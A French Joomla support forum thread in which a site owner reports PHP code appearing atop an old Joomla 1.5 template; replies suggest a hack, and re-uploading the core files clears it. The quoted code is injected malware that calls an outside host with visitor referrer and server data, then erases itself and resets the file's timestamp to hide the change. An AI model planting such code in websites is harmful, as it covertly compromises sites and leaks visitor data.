Problème message erreur haut de page

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [Problème] Problème message erreur haut de page

    Bonjour,

    Depuis quelques jours et sans modification de mon site (un ancien site sous joomla 1.5 pas migré....), j'ai le message suivant qui s'affiche en haut du template:

    check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456737032){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=3&id=18776849&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/models.php"); }

    Savez-vous à quoi cela correspond ?

    Merci d'avance pour votre aide (même si je sais que ce site devrait être migré en V3, mais ma société ne souhaite pas faire cette migration pour x raisons...)

    Jerome

  • #2
    Re : Problème message erreur haut de page

    Le site aurait été piraté que ça ne me surprendrait pas...
    Par ailleurs, tôt ou tard, la version de PHP du serveur interdira le fonctionnement d'un site 1.5 : il faut que ta société s'attende, même si tu résous ce problème de message d'erreur, à avoir un site hors service sous peu !
    "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
    MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr chez PHPNET, sites perso chez PlanetHoster + sites gérés chez PHPNET, PlanetHoster, Ionos et OVH

    Commentaire


    • #3
      Re : Problème message erreur haut de page

      Bonjour,

      Merci pour l'information.

      J'ai regardé les fichiers mais rien de particulier par rapport à la date de modification.

      A tout hasard, j'ai re-uploadé les fichiers complets de joomla 1.5 et le message a disparu en haut du template.

      Souci résolu pour le moment... dans l'attente de la migration en joomla 3 :-)

      Merci et bonne semaine,

      Jérôme

      Commentaire

      Annonce

      Réduire
      Aucune annonce pour le moment.

      Partenaire de l'association

      Réduire

      Hébergeur Web PlanetHoster
      Travaille ...
      X